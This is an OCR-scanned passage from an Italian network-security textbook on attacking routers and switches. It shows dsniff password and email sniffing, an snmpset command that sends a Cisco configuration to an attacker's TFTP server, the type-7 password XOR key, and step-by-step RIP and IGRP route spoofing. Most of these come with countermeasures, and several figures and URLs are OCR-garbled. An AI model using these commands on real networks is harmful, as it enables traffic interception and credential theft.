Il numero di applicazioni che utilizzano password e testo in chiaro sono numerose e 
vale la pena ricordarle: FTP, telnet, POP, SNMP, HTTP, NNTP, ICQ, IRC, File Sharing, 
Socks, Network File System (NFS), mountd, rlogin, IMAP, AIM, X11, CVS, Citrix ICA, 
pcAnywhere, NAI Sniffer, Microsoft SMB e Oracle SQL*Net, solo per citarne alcune. La 
maggior parte di queste applicazioni utilizza nomi utente e password in chiaro oppure 
adotta una qualche forma di cifratura debole, di codifica o di mascheramento che può 
essere facilmente svelato. Questa è la situazione in cui dsniff offre il meglio di sé. 
Con dsniff è possibile effettuare lo spoofing ARP su un segmento Ethernet condivi- 
so o commutato, Utilizzando questo tool, un aggressore può rimanere in ascolto del 
traffico inviato sulla rete. Potete anche scaricare e provare la versione del prodotto 
per piattaforme Win32 dal sito Web di eEye all'indirizzo http://ww.eeye.com. Se la- 
vorate con sistemi Windows, dovete utilizzare l'interfaccia winpcap NDIS, che potreb- 
be però causare degli inconvenienti su sistemi con problemi di conflitto tra driver. Po- 
tete scaricare Winpcap dal sito Web all'indirizzo http://netgroupserv.polito.it/ 
twinpcap/install/Default.htm. Se eseguito in ambiente Linux, dsniff consente di 
svelare tutte le password in chiaro o deboli che transitano sul cavo: 


[mploessel@hackerbox dsniff-1.8] dsniff 


05/21/00 10:49:10 brett -> bigserver (ftp) 
USER brettp 
PASS colorado 


05/21/00 10:53:22 ggf -> epierce (telnet) 
epierce 
kaze 


05/21/00 11:01:11 niuhi -> core.lax (snmp) 
[version 1] 
d4yj4y 


Oltre allo strumento di intercettazione delle password, il pacchetto Dsniff include anche 
un assortimento di utilità, come per esempio mailsnarf e webspy, che vale la pena esa- 
minare. mailsnarf è un piccolo programma molto interessante che consente di rias- 
semblare tutti i pacchetti di posta elettronica e visualizzare il loro contenuto sullo scher- 
mo, proprio come se fossero stati scritti da voi. webspy è utile, inoltre, se volete tenere 
traccia dei siti Web visitati dai dipendenti, Il programma consente, infatti, di registrare 
dinamicamente nel vostro browser Web le pagine visitate dalla persona controllata: 


[root]}# mailsnarf 

From mploessel@hackingexposed.com Mon May 29 23:19:10 2000 
Message-ID: 001701bfca02$7909cca99$6433a8c0@foobar.com 
Reply-To: "Matthew Ploessel" mploessel@hackingexposed.com 
From: "Matthew Ploessel" mploessel@hackingexposed.com 

To: "George Kurtz" george@hackingexposed.com 

References: 002201bfc72987d7ffe70$ab8d0b18@J0C 

Subject: Re: lights please 

Date: Mon, 29 May 2000 23:44:15 -0700 
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MIME-Version: 1.0 
Content-Type: multipart/alternative; 

boundary="— —=_NextPart_000_0014_01BFC9C7.CC970F30" 
X-Priority: 3 
X-MSMail-Priority: Normal 
X-Mailer: Microsoft Outlook Express 5.00.2919.6600 
X-Mime0OLE: Produced By Microsoft Mime0OLE V5.00.2919.6600 


This is a multi-part message in MIME format. 
— — —=_NextPart_000_0014_01BFC9C7.CC970F30 
Content-Type: text/plain; 

charset="is0-8859-1" 
Content-Transfer-Encoding: quoted-printable 
George, 


I left the goldfish in my dark cubicle and it turned white. Who should 
I talk to for better lighting? 
-Matt 


webmitm è una nuova e potente funzionalità di dsniff. Con webmitm, il traffico 
SSL/SSH può essere intercettato e contraffatto. Ovviamente, questo attacco metterà 
sull'avviso gli utenti del Web a causa del certificato SSL che risulta falsificato, sebbe- 
ne a un esame più attento il nome dell’emittente sembri corretto. Solo un utente con 
un occhio esperto sarà in grado di rilevare la differenza. 

dnsspoof è una funzionalità molto potente di dsniff. Esso intercetta le ricerche e 
le risposte DNS con l’indirizzo IP configurabile. In questo caso, l'aggressore ha uti- 
lizzato 31.3.3.7: 


C:\ping www.hackingexposed.com 


Pinging ww.hackingexposed.com [31.3.3.7] with 32 bytes of data: 
Reply from 31.3.3.7: bytes=32 time<10ms TTL=249 
Reply from 31.3.3.7: bytes=32 time<10ms TTL=249 
Reply from 31.3.3.7: bytes=32 time<10ms TTL=249 
Reply from 31.3.3.7: bytes=32 time<1@ms TTL=249 


Anche se leggere la posta del vostro vicino potrebbe rivelarsi divertente, in 


genere è anche un reato. 


° Contromisure a dsniff 


La contromisura tradizionale per difendersi dall'intercettazione delle password in 
chiaro, è sempre stata quella di passare da un supporto condiviso su Ethernet a un 
supporto commutato. Gli switch non forniscono tuttavia alcun contributo alla lotta 
contro gli attacchi per intercettazione. 

La migliore contromisura per dsniff è utilizzare una qualche forma di cifratura del 
traffico di rete. Potete utilizzare un prodotto come SSH (Secure Shel!) per incapsula- 
re tutto il traffico in un sistema SSH prima di spedirlo in chiaro, o servirvi di un tun- 
nel basato su IPSec per effettuare la crittografia end-to-end di tutto il vostro traffico, 


® Ettercap 


Descritto come il più potente tool di manipolazione del traffico, Ettercap (ht - 
tp://ettercap.sourceforge.net) consente anche all’hacker alle prime armi di ef- 
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fettuare lo sniffing e la manipolazione avanzata dei pacchetti. Ettercap consente di 
eseguire lo sniffing full-duplex e l'inserimento dati senza soluzione di continuità, il 
tutto con l’aiuto di un'interfaccia grafica. Gli amministratori di rete dovranno inseri- 
re questo tool di autorità nell'elenco delle “dieci principali ricercati”. 


Errori di configurazione 


Gli errori di configurazione più semplici sono una causa piuttosto diffusa di vulne- 
rabilità. Il rafforzamento del software, la crittografia e il ricorso a password difficili 
da indovinare risultano inutili quando viene aperta una porta virtuale a causa di ne- 
gligenze elementari che incidono sulla sicurezza. 


® Read/Write MIB 


Diffusione: 2 
Semplicità: 8 
Impatto: 9 
Fattore di rischio: 6 


Molti dispositivi di rete supportano una vecchia MIB che consente a chiunque sia in 
possesso del nome di comunità per lettura e scrittura, di scaricare via TFTP il file di 
configurazione del router o dello switch. Nel caso di Cisco, la MIB in questione è 
OLD- CISCO-SYS-MIB. Poiché l’elenco delle password Cisco è cifrato all’interno di 
questo file (con un algoritmo di cifratura debole, un banale XOR), un hacker po- 
trebbe decifrarlo e riconfigurare il vostro router o switch. 

Potete verificare voi stessi se i vostri router sono vulnerabili: con IP Network Brow- 
ser di SolarWinds (http://ww.solarwinds.net), digitate il nome di comunità 
SNMP per lettura e scrittura, quindi lanciate una scansione del dispositivo o della 
rete che vi interessa, Alla fine, otterrete per ogni dispositivo l'albero delle informa- 
zioni SNMP disponibili (si veda la Figura 9.4). 


IP Browser172.16.17,09 \255.255.255.255 


Ele: oder Suoni Dplene den He 


s]6] 
E} 172.16.17.09: SystemHQ] 
db Cisco 3640 


System MIB 
Interfaces 
Cards 

108 

Flash Memory 
Hub ports 
TCP/IP Networks 
IPX Network 
Roures 

ARP Table 

UDP Services 
TCP Connections 


Figura 9.4 


IP Network Browser di SolarWinds dispone di un'interfaccia 
semplice per visualizzare tutte le stringhe rilevate. 
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Quando il dispositivo selezionato risponde e vengono visualizzati i nodi foglia 
dell’albero, selezionate Nodes/View Config File nella barra dei menu. In questo 
modo verrà avviato il vostro server TFTP e, se il router è vulnerabile, riceverete il 
file di configurazione Cisco, come mostrato nella Figura 9.5. 


A TEST"1.C1IS - Cisco Config Viewer 
File Edit Goto IPAddress View Options. Help 


|a) ala) +[&lelx| dales] 


|a CompanyHQ. CiscoConfig 
1* IP Address 


community 
1* Downloaded 6/23/99 22:22:15 PH by Cisco Config Viewer Varsion 
Cu£.1 


! 

version ll.2 

service password-encryption 
service udp-small-servers 
service tcp-small-servers 

! 

hostnane CompanyHQ 

Ù 

enable secret 5 #1#.pUtsw8juwdzxfSnHkjl1IFWcDuv. 
enable password 7 08204E 

' 


ip subnet-zero 
isdn switch-type basic-nil 
' 


interface Ethernet 0/0 
ip address 17Z.16.17.17 255.255. 255.240 
' 


interface Seriall/0 
ip address 172.17.1.1 255.255. 255.0 
no fair-queue 

' 


interface Serial1/1 


i-_ -44---- 109 1250 nea sr4u ser ner arr n 


|IOS 11,2 | CAPS | INS _y 


Figura 9.5 


Il prodotto Cisco Config Viewer di SolarWinds consente di scaricare facilmente 
il file di configurazione Cisco, una volta che sia noto il nome di comunità per lettura e scrittura. 


Una volta scaricato il file di configurazione, per decifrarlo è sufficiente premere il pul- 
sante Decrypt Password sulla barra degli strumenti, come mostrato nella Figura 9.6. 
Per verificare se un vostro dispositivo sia vulnerabile, senza violarlo, potete cercarlo 
sul sito ftp://ftp.cisco.com/pub/mibs/supportlists/. Una volta trovato, aprite 
il relativo file supportlist.txt: se al suo interno trovate riferimenti alla MIB OLD- 
CISCO-SYS-MIB, probabilmente siete vulnerabili. 

Sotto UNIX è sufficiente un solo comando per rispedire i file di configurazione Cisco. 
Una volta accertata la password di lettura/scrittura per un dispositivo (10.11.12.13), 
se sulla vostra macchina (192.168.200.20, per esempio) è in esecuzione un server TF- 
TP, è sufficiente il comando: 


Snmpset 10.11.12.13 private 1.3.6.1.4.1.9.2.1.55,192.168.200.20 s config.file 


I due elementi di un file di configurazione Cisco più appetibili per un hacker sono 
la password di abilitazione e l'autenticazione telnet. Entrambe le password sono 
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fa TEST”1.CIS - Cisco Config Viewer 
File Edit Goto IPAddess View Options Help 


DES 248] $ [Bal | x| Da 18] 


CompanyHQ scoConfig 


2:22:15 PH by Cisco Config Viewer Version 


service password-encryption 

service udp-small-servers 

service tcp-small-servers 

' 

hostname CompanyHQ 

' 

enable secret 5 $1$.pUt$w8jwdzxfSnHkj1IFWcDuv. 
enable password ab 

Ù 

ip subnet-zero 

isdn switch-type basic-nil 

Ù 

interface Ethernet 0/0 

ip address 172.16.17.17 255.255.255.240 
! 

interface Serial1/0 

ip address 172.17.1.1 255.255.255.0 

no fair-queue 

' 
interface Serial1/1 


2-44 104 150 ara nPA4 ner arr arr n 


B:| 
“flos 11.2 [ CAPS [INS 


Figura 9.6 


La decifrazione delle password Cisco nel file di configurazione è banale 
con la funzionalità Decrypt Password di Cisco Config Viewer. 


conservate in forma cifrata nel file di configurazione e, come vedremo tra breve, la 
decifratura è piuttosto elementare. 
Questa è la riga contenente la password di abilitazione cifrata: 


enable password 7 08204E 


Queste, invece, definiscono la password di autenticazione per telnet: 


line vty 0 4 
password 7 08204E 
login 


© Contromisure a Write Net MIB per Cisco 
Rilevamento 


Il modo più semplice per intercettare le richieste SNMP di scrittura della MIB è quel- 
lo di adottare syslog, che registra ogni richiesta. Innanzitutto dovrete installare il da- 
emon syslog sul sistema target UNIX o NT; quindi, dovrete attivare la registrazione 
da parte di syslog. Sui sistemi Cisco si usa il seguente comando: 


logging 196.254.92.83 
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Prevenzione 

Per impedire che un hacker possa approfittare della vecchia MIB, avete diverse 
possibilità. 

e  Servitevi di una ACL per limitare l'utilizzo di SNMP sul dispositivo solo alle 


reti o agli host autorizzati. Nel caso di dispositivi Cisco, per effettuare questa 
operazione si utilizza: 


access-list 101 permit udp 172.29.11.0 0.255.255.255 any eq 161 log 


e Consentite l’accesso via SNMP in sola lettura (read-0r/y, RO). Per i disposi- 
tivi Cisco, il comando è il seguente: 


snmp-server community <nome di comunità difficile> RO 
e Disattivare del tutto SNMP sui dispositivi Cisco: 
no snmp-server 


de 


«7 Cisco:cifratura debole 


Diffusione: 9 
Semplicità: 10 
Impatto: 10 
Fattore di rischio; 10 


Sui dispositivi Cisco è stato adottato per anni un algoritmo di cifratura debole per me- 
morizzare le password sia per vty sia di autorizzazione. Entrambe le password sono 
conservate nel file di configurazione del dispositivo (show config), e solitamente la 
loro decifratura richiede un impegno minimo. Per verificare se i vostri router sono 
vulnerabili, potete esaminarne il file di configurazione con il seguente comando: 


show config 


Se trovate una riga simile a quella riportata di seguito, che non comincia con il se- 
gno del dollaro ($), la password di abilitazione può essere facilmente decifrata nel 
modo seguente: 


enable password 7 08204E 


Se, invece, nel file di configurazione trovate una riga simile a quella, la password di 
abilitazione non è vulnerabile (ma le password per telnet continuano a esserlo): 


enable secret 5 $1$.pUt$w8jwdabc5nHkj1IFWcDav. 


Questo dimostra che siamo in presenza di un amministratore Cisco accorto, che ha 
utilizzato il comando enable secret per applicare l'algoritmo di cifratura MDS alla 
password, invece del comando predefinito enable password, che applica l’algorit- 
mo più debole. Per quanto ne sappiamo, però, la cifratura MD5 delle password è 
disponibile solo per la password di abilitazione e non per le altre definite sul siste- 
ma, come quella per vty: 


line vty 0 4 
password 7 08204E 
login 
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L'algoritmo debole non è che una semplice cifratura XOR basata su un seme (seed) 
coerente. Le password Cisco cifrate sono lunghe fino a 11 caratteri alfanumerici e 
tengono conto di maiuscole e minuscole. I primi due byte della password sono un 
numero decimale casuale da 0-0 a 0-F, il resto rappresenta la password cifrata me- 
diante un XOR con una sequenza di caratteri nota: “dsfd;kfoA,.iyewrkld]KDHSUB?”. 
Su Internet sono disponibili diversi programmi che permettono di decifrare questa 
password, ma il primo è stato uno script di shell realizzato da Hobbit (http:// 
www.avian.org). Il secondo è un programma C (ciscocrack.c) scritto da un hacker 
di nome SPHiXe, e può essere reperito in un'analisi della gestione delle password 
Cisco, svolta da diverse persone (http://ww.rootshell.com/archive-j457nxiq 
i39959dv/199711/ciscocrack.c.html). La terza versione è un'applicazione Palm 
Pilot sviluppata da Dr. Mudge di LOpht, che potete trovare sul sito http:// 
www.l@pht.com-kingpin/cisco.zip, corredata da un’analisi esauriente all'indirizzo 
http://packetstorm.decepticons.org/cisco/cisco.decrypt.tech.info.by.mu- 
dge.txt. Infine, la SolarWinds ha sviluppato un decifratore Cisco per NT. Il pro- 
gramma è incluso nella suite di gestione delle reti e può essere trovato all'indirizzo 
http://ww.solarwinds.net. 


Cisco Decryptor di SolarWinds 


Per quelli tra voi che lo preferiscono, SolarWinds di Tulsa, Oklahoma, vende una 
versione del decifratore Cisco per Windows. Questa società sviluppa software di ge- 
stione delle reti per grandi aziende di telecomunicazioni e offre un decifratore inte- 
grato nel prodotto Cisco Config Viewer, oltre alla versione standalone. Come si può 
vedere nella Figura 9.7, la decifratura è molto semplice. 


fà Cisco Password Deciyption 


File Decwypt Edit Help 


Enciypted Password F 08204E 


Deciypted Password ab 


Figura 9.7 

Cisco Password Descryptor di SolarVVinds è una semplice 
applicazione dotata d'interfaccia grafica 

per la decifratura delle password Cisco con cifratura debole. 


Contromisura alla decifratura delle password Cisco 


Prevenzione 


La soluzione a questo problema è utilizzare il comando enable secret quando si 
modifica la password. Questo comando imposta la password di abilitazione utilizzan- 
do l'algoritmo di cifratura MD5, per il quale non è ancora stata trovata una tecnica di 
decifratura. Sfortunatamente, non siamo al corrente di meccanismi analoghi per appli- 
care l’algoritmo MDS alle altre password Cisco, in particolare a quelle per vty. 
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® Download medianteTFTP 


Diffusione: 9 
Semplicità: 6 
Impatto: 9 
Fattore di rischio: 8 


La maggior parte dei router supporta il protocollo TFTP (Trivial File Transfer Proto- 
col), un sistema di trasferimento dei file basato su UDP (porta 69), utilizzato per ef- 
fettuare backup e ripristinare i file di configurazione. Ovviamente, per scoprire se 
questo servizio è attivo sui vostri dispositivi è sufficiente usare nmap: 


[root@happy] nmap -sU -p69 -nvv target 


Sfruttare TFTP per scaricare i file di configurazione è altrettanto semplice, se gli am- 
ministratori di rete hanno utilizzato nomi banali per i file. Per esempio, effettuando 
una ricerca inversa su DNS, a proposito di un dispositivo presente sulla rete 
(192.168.0.1), scopriamo che il relativo nome DNS è “lax-serial-rtr”, A questo punto, 
possiamo provare a scaricare il file .cfg che porta lo stesso nome, utilizzando il se- 
guente comando: 


[root@happy] tftp 

> connect 192.168.0.1 

> get lax-serial-rtr.cfg 
> quit 


Se il vostro router è vulnerabile, potreste trovare nella directory corrente il suo file 
di configurazione (lax-serial-rtr.cfg): con ogni probabilità conterrà i vari nomi di co- 
munità ed eventuali liste di controllo degli accessi. Per maggiori informazioni sul 
funzionamento di TFTP con dispositivi Cisco, potete consultare la sezione dell’ar- 
chivio di Packet Storm dedicata a Cisco, all'indirizzo http://packetstormsecurity 
.org/cisco/Cisco-Conf-0.08.readme. 


Contromisura per TFTP 


Prevenzione 


Per disattivare la vulnerabilità al TFTP, esistono diverse possibilità. 

e Disattivare del tutto l’accesso via TFIP. Il comando specifico per fare ciò di- 
pende fortemente dal particolare tipo di router. Per prima cosa, controllate 
la documentazione del prodotto. Per la famiglia Cisco 7000, potete provare: 


no tftp-server flash <<dispositivo:nomefile>> 


e Attivare un filtro che impedisca l’accesso via TFTP. Nel caso dei router Ci- 
sco, dovrebbe essere sufficiente qualcosa del genere: 


access-list 101 deny udp any any eq 69 log ! Block tftp access. 
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Hacking del protocollo di routing 


In tutto questo capitolo, abbiamo solo accennato all'argomento della compromis- 
sione della rete. In questo paragrafo parleremo dei protocolli di routing. Alcune tec- 
niche di attacco sono un rischio teorico ma devono comunque essere considerate 
una possibile minaccia. I rischi connessi alla modifica dei dati, agli attacchi Man-In- 
The-Middle e DoS e allo sniffing dei pacchetti sono una possibilità tutt'altro che re- 
mota, per cui non possono essere ignorati, I protocolli di routing sono obiettivi mol- 
to allettanti poiché consentono di controllare i dati e il loro flusso. 

Sono tuttavia disponibili alcuni tool. Nonostante la scelta dipenda dal sistema ope- 
rativo adottato vi consigliamo i seguenti: 

e http://ww.ntsecurity.nu/toolbox/rpak/ 

e Nhttp://mww.phenoelit.de/irpas/ 


® Contraffazione di pacchetti RIP 


Diffusione: 4 
Semplicità: 4 
Impatto: 10 
Fattore di rischio: 6 


Una volta identificati i dispositivi di instradamento presenti sulla vostra rete, gli hac- 
ker più sofisticati ricercheranno i dispositivi che supportano il protocollo RIP v1 
(RFC 1058) o RIP v2 (RFC 1723). Perché? Perché i pacchetti RIP possono essere fa- 
cilmente contraffatti. 
e RIPè basato su UDP (porta 520/UDP), che notoriamente è un protocollo 

non si affida alla connessione; pertanto, è in grado di accettare qualsiasi 

pacchetto ricevuto anche se non è in risposta a un pacchetto inviato. 
e RIP vl non prevede meccanismi di autenticazione, consentendo a chiunque 

di inviare un pacchetto RIP a un router, con la certezza che questo non ver- 

rà scartato. 
e RIP v2 dispone di una rudimentale forma di autenticazione che permette 

l'uso di una password non cifrata di 16 byte, ma ovviamente, come avrete 

ormai imparato, le password in chiaro possono essere intercettate. | 
Di conseguenza, un hacker può inviare pacchetti a un router RIP, chiedendo che 
questi vengano reindirizzati a una rete 0 a un sistema non autorizzato, piuttosto che 
al legittimo destinatario. Di seguito viene descritta la procedura per attaccare un 
router RIP. 


1. Identificate il router RIP che desiderate attaccare, eseguendo una scansione 
della porta UDP 520. 
2. Determinate la tabella di instradamento. 


e Se vi trovate sullo stesso segmento fisico su cui si trova il router e siete 
in grado di catturare il traffico, potete ascoltare i broadcast RIP che di 
chiarano i propri percorsi di instradamento (nel caso di un router RIP 
attivo), oppure potete richiedere i percorsi di instradamento (nel caso 
di un router RIP passivo o attivo). 
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e Sevitrovate su una postazione remota o non siete in grado di catturare 
i pacchetti sul cavo, potete utilizzare il programma di utilità rprobe di 
Humble. Aprite rprobe in una finestra e chiedete al router RIP quali 
sono i percorsi di instradamento disponibili: 


[root#] rprobe -v 192.168.51.102 
Sending packet. 
Sent 24 bytes. 


e Aprite tcpdump (o il vostro software favorito per la cattura dei pacchet- 
ti) in un’altra finestra e leggete la risposta del router (l’output generato 
da SnifferPro di Network Associates potrebbe differire da quello prodot- 
to dal vostro analizzatore di pacchetti): 


SEL CECCECIEZEZZCE RIP Header ---------..-..-...-- 
Routing data frame 1 
Address family identifier 
IP address = [10.42.33.0] 
Metric = 3 


Il] 
N 
_ 
Lan 
n°) 
—_ 


Routing data frame 2 

Address family identifier = 2 (IP) 
IP address = [10.45.33.0] 

Metric = 3 


Routing data frame 2 

Address family identifier 

IP address = [10.45.33.0] 
Metric = 1 


[1] 
N 
_- 
Hi 
n°) 
_ 


3. Stabilite la condotta di attacco migliore. Questo tipo di attacco è limitato 
solo dalla creatività dell'hacker. In questo esempio vogliamo reindirizzare 
tutto il traffico diretto a un sistema verso la nostra macchina, per poterlo 
ascoltare e, di conseguenza, raccogliere informazioni importanti. 

Per fare questo dobbiamo aggiungere al router RIP (192.168.51.102) il se- 
guente percorso di instradamento: 


Indirizzo IP = 10.45.33.10 
Netmask = 255.255.255.255 
Gateway = 172.16.41.200 
Metric =1 


4. Aggiungete il percorso di instradamento. Utilizzando srip di Humble è 
possibile contraffare un pacchetto RIP v1 o v2 in modo da aggiungerlo al 
percorso di instradamento statico originale: 


[root#] srip -2 -n 255.255.255.255 172.16.41.200 192.168.51.102 
10.45.33.10 1 


5. In questo modo, tutto il traffico diretto all'indirizzo 10.45.33.1 (che potrebbe 
essere un qualsiasi server le cui password possono essere facilmente inter- 
cettate) verrà reindirizzato al sistema pirata (172.16.41.200), per essere ulte- 
riormente inoltrato. Ovviamente, per poter inoltrare il traffico in entrata sul 
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nostro sistema, è necessario utilizzare fragrouter o un servizio IP forwar- 
ding a livello di kernel: 


Fragrouter: 
[root#] ./fragrouter -B1 
IP forwarding a livello kernel: 


[root#] vi /proc/sys/net/ipv4/ip_forward (change 0 to 1) 


6. Configurate il vostro analizzatore di pacchetti Linux preferito (per esempio 
dsniff) ed esaminate i nomi utente e le password mentre vengono trasmessi, 

Per ulteriori informazioni sulla contraffazione dei pacchetti RIP, consultate i mes- 
saggi sul sito di Technotronic di Humble dedicati a questo argomento, all'indirizzo 
http://ww.technotronic.com/horizon/ripar.txt. 
Come si vede nella Figura 9.8, il traffico generato da DIANE può essere facilmente 
reindirizzato attraverso un sistema dell’hacker (PAUL), prima di essere inviato alla 
sua destinazione lecita (FRASIER). 


Il traffico scambiato 
tra DIANE e FRASIER 
passa attraverso 
i router RIPI 
DIANE e RIP2 senza 
192.168.50.212 interventi esterni 


Dopo aver inviato a RIP2 
il pacchetto RIP 
+ Ssagoio contraffatto, tutto il traffico 
RIP2 Router i destinato a FRASIER 
192.168.51.102 verrà reindirizzato 


172.16.41.200 lisi alla 
essere inoltrato a FRASIER, 
dopo però che il traffico 
è stato esaminato da PAUL 


RIP2 Router 


192.168.51.102 FRASIER 


10.45.33.10 


Figura 9.8 
L'intercettazione RIP permette di intervenire facilmente a piacere sulla rete. 
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© Contromisure alla contraffazione di pacchetti RIP 


Di seguito elenchiamo alcune contromisure contro la contraffazione dei pacchetti RIP. 


e Disattivate le funzioni RIP sui router, Il protocollo OSPF (Oper Shortest Path 
First) dispone di un numero maggiore di meccanismi di sicurezza standard, 
che consentono di limitare le possibilità di contraffazione dei pacchetti RIP 
dell’hacker. 


e Se possibile, respingete eventuali pacchetti RIP (porta TCP/UDP 520) su router 
esterni. Richiedete l'utilizzo solo di instradamenti statici. 


CO) IGRP 


FX, che ha sviluppato IRPAS Unterior Gateway Routing Protocol), ha inviato un 
esempio di scansione AS con la nuova versione (non ancora rilasciata) 2.14 di “ass”, 
in cui si mostra come le informazioni provenienti da ass (AS #10 e gli altri dati) sia- 
no state utilizzate con IGRP per inserire un instradamento contraffatto per 
222.222.222.0/24. Secondo FX, attualmente IGRP non è molto sfruttato, ma l’esem- 
pio è certamente interessante. Pertanto includiamo di seguito i risultati di questi 
test, a costo di allontanarci dal tema principale del prosieguo di questo capitolo: 


test# ./ass -mA -i eth0 -D 192.168.1.10 -b15 -v 
ASS [Autonomous System Scanner] $Revision: 2.14 $ 
(c) 2k FX <fx@phenoelit.de> 
Phenoelit (http://www.phenoelit.de) 
No protocols selected; scanning all 
Running scan with: 
interface ethQ0 
Autonomous systems 0 to 15 
delay is 1 
in ACTIVE mode 


Building target list 
192.168.1.10 is alive 

Scanning ... 

Scanning IGRP on 192.168.1.10 
Scanning IRDP on 192.168,1,10 
Scanning RIPvi on 192.168,1.10 
shutdown . 


>>>>>>>>>>>> Results >>>>>>>>>>> 


192.168.1.10 
IGRP 
#AS 00010 10.0.0.0 (50000,1111111,1476,255,1,0) 
IRDP 


192.168.1.10 (1800,0) 

192.168.9.99 (1800,0) 
RIPvI 

10.0.0.0 (1) 


test# ./igrp -i eth@ -f routes.txt -a 10 -S 192.168.1.254 -D 192.168.1.10 
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routes.txt: 

# Format 

# destination:delay:bandwith:mtu:reliability:load:hopcount 
222.222.222.0:500:1:1500:255:1:0 


Cisco#sh ip route 
Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP 
D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area 
E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP 
i - IS-IS, Li - IS-IS level-1, L2 - IS-IS level-2, * - candidate 
default 
U - per-user static route 


Gateway of last resort is not set 


10.0.0.0/8 is variably subnetted, 2 subnets, 2 masks 
10.1.2.0/30 is directly connected, Tunnel® 
10.0.0.0/8 is directly connected, Tunnel0® 
192.168.9.0/24 is directly connected, EthernetQ 
192.168.1.0/24 is directly connected, Etherneto 
222.222.222.0/24 [100/1600] via 192.168.1.254, 00:00:05, Ethernet® 


HOOoOnOAa 


se 


C) OSPF 


L'OSP (Open Shortest Patb First) è definito nella RFC 2328 come un protocollo di 
routing IP basato su standard, progettato per superare i limiti dell’RIP. Poiché 
l'’OSPF è un protocollo di routing a stato di link, esso invia pacchetti di aggiorna- 
mento noti come LSA (Link State Advertisement) a tutti gli altri router inseriti nella 
medesima area gerarchica. L'OSPF viene eseguito su Protocol 89 e dipende per le 
comunicazioni dal traffico multicast. Esistono numerose vulnerabilità grazie alle 
quali un aggressore può inviare a ripetizione pacchetti LSA modificati per avere una 
qualche probabilità di influenzare i dati di instradamento. L’OSPF funziona senza ri- 
correre all’autenticazione. Si raccomanda l'utilizzo delle password di testo in chiaro 
e MD5 supportate. 

Noto come processo particolarmente complesso, l’OSPF è vulnerabile ad attacchi 
Livello 2 Man-In-The-Middle, Anche con l'utilizzo di password in testo ordinario, gli 
instradamenti OSPF possono essere modificati, con conseguente compromissione 
di intere comunità di utenti OSPF. Sono molte le opzioni disponibili per porre rime- 
dio a questa vulnerabilità. La strategia di difesa deve sempre prevedere l’utilizzo 
dell’MDS anziché del testo ordinario. 

Per rendere meno vulnerabili le comunicazioni con gli utenti OSPF vicini, è consi- 
gliato l'utilizzo del NBMA (Non Broadcast Multi Access), come mostrato in seguito. 
Le modifiche dei vicini e gli aggiornamenti devono sempre essere registrati. 


Router | Router 2 

ospf add interface TO-RS2 spf add interface TO-RS1 

to-area backbone type non-broadcast to-area backbone type non-broadcast 
non-broadcast non-broadcast 

ospf add nbma-neighbor 10.0.0.2 ospf add nbma-neighbor 10.0.0.1 


to-interface to-Router2 to-interface to-Routeri 
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® BGP 


Il BGPv4 (Border Gateway Protocol versione 4) è l'equivalente dell'’EGP (£xzerior 
Gateway Protocol) standard da cui dipende attualmente il funzionamento di Inter- 
net. BGP consente al sistema di instradamento interdomini di garantire automatica- 
mente lo scambio senza loop di informazioni di instradamento tra due sistemi auto- 
nomi. Nel BGP, ogni instradamento è costituito da un percorso di sistema autono- 
mo, rappresentato da attributi di percorso e identificatori di rete chiamati ASN (Au- 
tonomous System Numbers); per ulteriori informazioni sugli ASN visitate l'indirizzo 
http://ww.arin.net. Poiché l'affidabilità di Internet dipende in gran parte dal 
BGP, alcuni hacker scelgono router BGP come bersaglio principale dei loro attac- 
chi. Qualora un aggressore sia riuscito a compromettere un router con BGP attivato, 
egli potrà quantomeno fare un giro panoramico di tutta la rete. Data l’esistenza di 
questo rischio, in molte dorsali di reti di grandi dimensioni sono assunti degli spe- 
cialisti destinati a lavorare specificamente sulla configurazione e sulla sicurezza di 
questi sistemi essenziali. Nelle reti di dimensioni piccole o medie questo non è pos- 
sibile, per cui tali reti sono più facilmente soggette ad attacchi. 

Per una panoramica generale sul BGP, visitate l'indirizzo http://ww.cisco.com/ 
en/US/tech/tk648/tk365/tk80/tech protocol home.html. 

Il processo con cui si ottiene l’accesso a un router con BGP attivato è lo stesso per 
qualsiasi altro router citato in questo capitolo. Se il sistema è stato fortificato, questa 
operazione può risultare difficile, anche se in ogni sistema c'è sempre l’anello più 
debole della catena. 

Esaminiamo ora alcuni dei tipi di attacchi maggiormente diffusi che assicurano l’ac- 
cesso privilegiato. 


Attacco 
Telnet a forza bruta 


SSH a forza bruta 


A forza bruta, mi- 
rato all'amministra- 
zione del Web 


Sniffing del traffico 


Read/Write SNMP 


Vantaggi 


Il numero di tentati- 
vi di connessione al 
secondo può essere 
elevato. 


I tentativi falliti non 
verranno registrati da 
un IDS. 


I tool a forza bruta 
sono facilmente re- 
peribili e di norma 
non mettono un IDS 
in allarme. 


Cattura le credenzia- 
li di login di SNMP e 
telnet, 


I tool SNMP a forza 
bruta sono facilmente 
utilizzabili e di solito 
più veloci di quelli a 
forza bruta agenti a li- 
vello di login. 


Svantaggi 


I tentativi fall.iti ver- 
ranno registrati. 


Un processo a forza 
bruta relativamente 
più lento. 

Di norma il Web ser- 
ver non è in funzione. 


Di solito è complesso. 
Se l'accesso fisico è 
possibile, è preferibile 
utilizzare tipi di attac- 
chi meno diîfficili. 

Le stringhe Read/Wri- 
te accessibili sono ra- 
re. 


Contromisure 


Limitare l’accesso a in- 
dirizzi IP di fiducia me- 
diante le ACL. 

Ove possibile, utilizza- 
re l'SSH, 

Limitare l'accesso me- 
diante le ACL ai soli in- 
dirizzi IP di fiducia. 
Disattivare i servizi Web, 


Monitorare i log per le 
inattività dell’’interfac- 
cia. Attuare misure più 
efficaci di protezione 
dell'hardware. 

Non servirsi di RW 
SNMP. Filtrare e limi- 
tare l'utilizzo di SNMP, 
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Se è possibile ottenere l’accesso locale privilegiato, si può realizzare un'escalation 
dell'attacco. Tramite un processo a più stadi, può risultare più agevole sfruttare i 


punti vulnerabili. 


Attacco 


Third-party IP 
block. announce- 
ment 


Vantaggi 


Di solito non viene 
rilevato dal gestore 
del router. 


Man In The Midele Cattura remota di tut- 


to il traffico di rete, 


Svantaggi 


Gli annunci possono 
essere limitati dal for- 
nitore a monte, 


Rilevabile grazie al 
cambiamento del per- 
corso di instradamento 
e della latenza; inoltre 


Contromisure 


Utilizzare sempre filtri 
degli annunci sia sul 
router a monte sia su 
quello locale. 


Effettuare il monitorag- 
gio remoto dei cambia- 
menti dei percorsi AS 
dei blocchi annuncia- 


